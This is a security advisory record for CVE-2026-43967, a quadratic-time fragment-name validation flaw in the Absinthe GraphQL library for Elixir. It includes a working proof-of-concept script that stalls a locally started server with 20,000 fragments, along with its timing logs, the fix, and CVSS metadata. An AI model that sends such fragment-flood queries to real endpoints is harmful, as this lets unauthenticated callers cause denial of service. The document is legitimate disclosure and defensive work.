  "Sending GraphQL document with #{n} fragment definitions (~#{div(byte_size(query), 1024)} KB) to 127.0.0.1:#{port}"
)

{us, response} =
  :timer.tc(fn ->
    Req.post!("http://127.0.0.1:#{port}/graphql",
      json: %{query: query},
      receive_timeout: 600_000,
      retry: false
    )
  end)

ms = div(us, 1000)
IO.puts("HTTP response status: #{response.status}")
IO.puts("Total request elapsed (validation-dominated): #{ms} ms")

result =
  if ms > 1000 do
    "VERIFIED: ~#{n} fragments in one unauthenticated request forced #{ms} ms of CPU in Absinthe's UniqueFragmentNames phase (quadratic check)."
  else
    "NOT VERIFIED: elapsed #{ms} ms below DoS threshold"
  end

IO.puts(result)

Logs

HTTP response status: 200
Total request elapsed (validation-dominated): 15451 ms
VERIFIED: ~20000 fragments in one unauthenticated request forced 15451 ms of CPU in Absinthe's UniqueFragmentNames phase (quadratic check).

Severity

8.7 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Hex",
        "name": "absinthe"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.2.0"
            },
            {
              "fixed": "1.10.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-43967"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-407"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T13:08:44Z",
    "nvd_published_at": "2026-05-08T16:16:12Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nAn unauthenticated attacker can stall an Absinthe-backed GraphQL endpoint by submitting a query that contains many fragment definitions. The fragment-name uniqueness validation phase is O(N\u00b2) in the number of fragments, so a single modestly-sized request burns seconds of CPU per worker, and sustained traffic exhausts the worker pool (denial of service).\n\nIntroduced like with https://github.com/absinthe-graphql/absinthe/commit/0b46e3bcc06c0d3797bacd64761b908a84646c1d#diff-e540120c6a98cc1013be110d08e9d029511b9aabd26ad5f7f643c36834caac14\n\n### Details\n`Absinthe.Phase.Document.Validation.UniqueFragmentNames` (`lib/absinthe/phase/document/validation/unique_fragment_names.ex:14-40`) walks every fragment in `input.fragments` via `run/2`, calling `process/2` on each one. `process/2` then calls `duplicate?/2`, which evaluates `Enum.count(fragments, fn f -\u003e f.name == name end)` \u2014 a full linear scan of the fragment list \u2014 for every individual fragment. The result is `N \u00b7 N` name comparisons per document.\n\n`input.fragments` is built directly from the GraphQL query text the caller sends at the head of the pipeline, so `N` is attacker-controlled. A minimum-size fragment definition (`fragment a on T{f}`) is roughly 16 bytes, so a ~1 MB document carries ~60 000 fragments and forces ~3.6 \u00d7 10\u2079 comparisons inside this one phase. Phoenix\u0027s default 8 MB body limit allows substantially larger blow-ups if operators have not lowered it. Nothing in this module caps `N`.\n\nThe fix is to aggregate names once per call rather than re-scanning per fragment, e.g.:\n\n```elixir\ndups =\n  for {name, k} \u003c- Enum.frequencies_by(input.fragments, \u0026 \u00261.name),\n      k \u003e 1,\n      into: MapSet.new(),\n      do: name\n```\n\nand then check `MapSet.member?(dups, fragment.name)` inside `process/2`. That collapses the phase to O(N).\n\n### PoC\nA standalone script that builds a GraphQL document with a large number of minimal fragment definitions, feeds it through Absinthe\u0027s pipeline, and times the `UniqueFragmentNames` phase is attached at the end of this report. Running it shows the validation time growing quadratically with the fragment count.\n\n### Impact\nAlgorithmic complexity / denial-of-service. Any service that exposes an Absinthe GraphQL endpoint to untrusted callers is affected: a single unauthenticated POST containing many fragment definitions pins a worker process for seconds, and modest sustained traffic exhausts the request-handling pool. No authentication, schema knowledge, or special configuration is required \u2014 only the ability to send a GraphQL query large enough to contain many fragments, which is permitted by Phoenix\u0027s default body-size limit.\n\n## Scripts and Logs\n\n```elixir\n# Verifies: Quadratic fragment-name uniqueness check\n\nMix.install([\n  {:absinthe, \"~\u003e 1.7\"},\n  {:absinthe_plug, \"~\u003e 1.5\"},\n  {:bandit, \"~\u003e 1.0\"},\n  {:plug, \"~\u003e 1.15\"},\n  {:jason, \"~\u003e 1.4\"},\n  {:req, \"~\u003e 0.5\"}\n])\n\ndefmodule VictimSchema do\n  use Absinthe.Schema\n\n  object :thing do\n    field :f, :string\n  end\n\n  query do\n    field :thing, :thing do\n      resolve(fn _, _ -\u003e {:ok, %{f: \"x\"}} end)\n    end\n  end\nend\n\ndefmodule VictimRouter do\n  use Plug.Router\n\n  plug :match\n\n  plug Plug.Parsers,\n    parsers: [:json],\n    pass: [\"*/*\"],\n    json_decoder: Jason\n\n  plug :dispatch\n\n  forward \"/graphql\",\n    to: Absinthe.Plug,\n    init_opts: [schema: VictimSchema]\n\n  match _ do\n    send_resp(conn, 404, \"nope\")\n  end\nend\n\nport = 47817\n{:ok, _} = Bandit.start_link(plug: VictimRouter, port: port)\n\nn = 20_000\n\nfragments =\n  1..n\n  |\u003e Enum.map(fn i -\u003e \"fragment f#{i} on Thing{f}\" end)\n  |\u003e Enum.join(\" \")\n\nquery = \"{ thing { f } } \" \u003c\u003e fragments\n\nIO.puts(\n  \"Sending GraphQL document with #{n} fragment definitions (~#{div(byte_size(query), 1024)} KB) to 127.0.0.1:#{port}\"\n)\n\n{us, response} =\n  :timer.tc(fn -\u003e\n    Req.post!(\"http://127.0.0.1:#{port}/graphql\",\n      json: %{query: query},\n      receive_timeout: 600_000,\n      retry: false\n    )\n  end)\n\nms = div(us, 1000)\nIO.puts(\"HTTP response status: #{response.status}\")\nIO.puts(\"Total request elapsed (validation-dominated): #{ms} ms\")\n\nresult =\n  if ms \u003e 1000 do\n    \"VERIFIED: ~#{n} fragments in one unauthenticated request forced #{ms} ms of CPU in Absinthe\u0027s UniqueFragmentNames phase (quadratic check).\"\n  else\n    \"NOT VERIFIED: elapsed #{ms} ms below DoS threshold\"\n  end\n\nIO.puts(result)\n```\n\n\n### Logs\n\n```logs\nHTTP response status: 200\nTotal request elapsed (validation-dominated): 15451 ms\nVERIFIED: ~20000 fragments in one unauthenticated request forced 15451 ms of CPU in Absinthe\u0027s UniqueFragmentNames phase (quadratic check).\n```",
  "id": "GHSA-9mhv-8h52-q7q2",
  "modified": "2026-05-14T13:08:44Z",
  "published": "2026-05-14T13:08:44Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/absinthe-graphql/absinthe/security/advisories/GHSA-9mhv-8h52-q7q2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43967"
    },
    {
      "type": "WEB",
      "url": "https://github.com/absinthe-graphql/absinthe/commit/223600c520493dcaf95080af552c413099f92c9d"
    },
    {
      "type": "WEB",
      "url": "https://cna.erlef.org/cves/CVE-2026-43967.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/absinthe-graphql/absinthe"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/EEF-CVE-2026-43967"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Absinthe: Quadratic fragment-name uniqueness check"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-43967 (GCVE-0-2026-43967)

FKIE_CVE-2026-43967

GHSA-9MHV-8H52-Q7Q2

Summary

Details

PoC

Impact

Scripts and Logs

Logs

Tags

Sightings

Nomenclature